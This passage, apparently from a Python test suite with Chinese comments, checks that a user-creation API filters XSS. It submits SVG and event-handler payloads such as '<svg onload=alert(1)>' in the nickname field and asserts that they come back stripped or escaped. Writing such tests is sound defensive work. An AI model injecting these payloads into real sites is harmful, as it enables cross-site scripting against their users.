"email": f"event_{payload[:10]}@test.com",
"phone": "13800138000",
"status": 1
}
response = await user_api.create_user(user_data)
if response.status_code in [201, 200]:
user_id = response.json().get("id")
if user_id:
user_info = await user_api.get_user_by_id(user_id)
if user_info.status_code == 200:
user = user_info.json()
assert "onmouseover=" not in str(user), \
f"事件处理器未过滤: {payload}"
assert "onclick=" not in str(user), \
f"事件处理器未过滤: {payload}"
await user_api.delete_user(user_id)
async def test_svg_xss(self, authenticated_client):
"""
SEC-XSS-08: SVG XSS测试
验证点:
1. SVG标签事件被过滤
2. SVG脚本被移除
"""
user_api = UserAPI(authenticated_client)
svg_payloads = [
"<svg onload=alert(1)>",
"<svg><script>alert(1)</script></svg>",
"<svg><animate onbegin=alert(1)></svg>",
"<svg><set onbegin=alert(1)></svg>"
]
for payload in svg_payloads:
user_data = {
"username": f"svg_test_{payload[:10]}",
"password": "Test123!@#",
"nickname": payload,
"email": f"svg_{payload[:10]}@test.com",
"phone": "13800138000",
"status": 1
}
response = await user_api.create_user(user_data)
if response.status_code in [201, 200]:
user_id = response.json().get("id")
if user_id:
user_info = await user_api.get_user_by_id(user_id)
if user_info.status_code == 200:
user = user_info.json()
assert "<svg" not in str(user).lower() or \
"&lt;svg" in str(user).lower(), \
f"SVG XSS未过滤: {payload}"
await user_api.delete_user(user_id)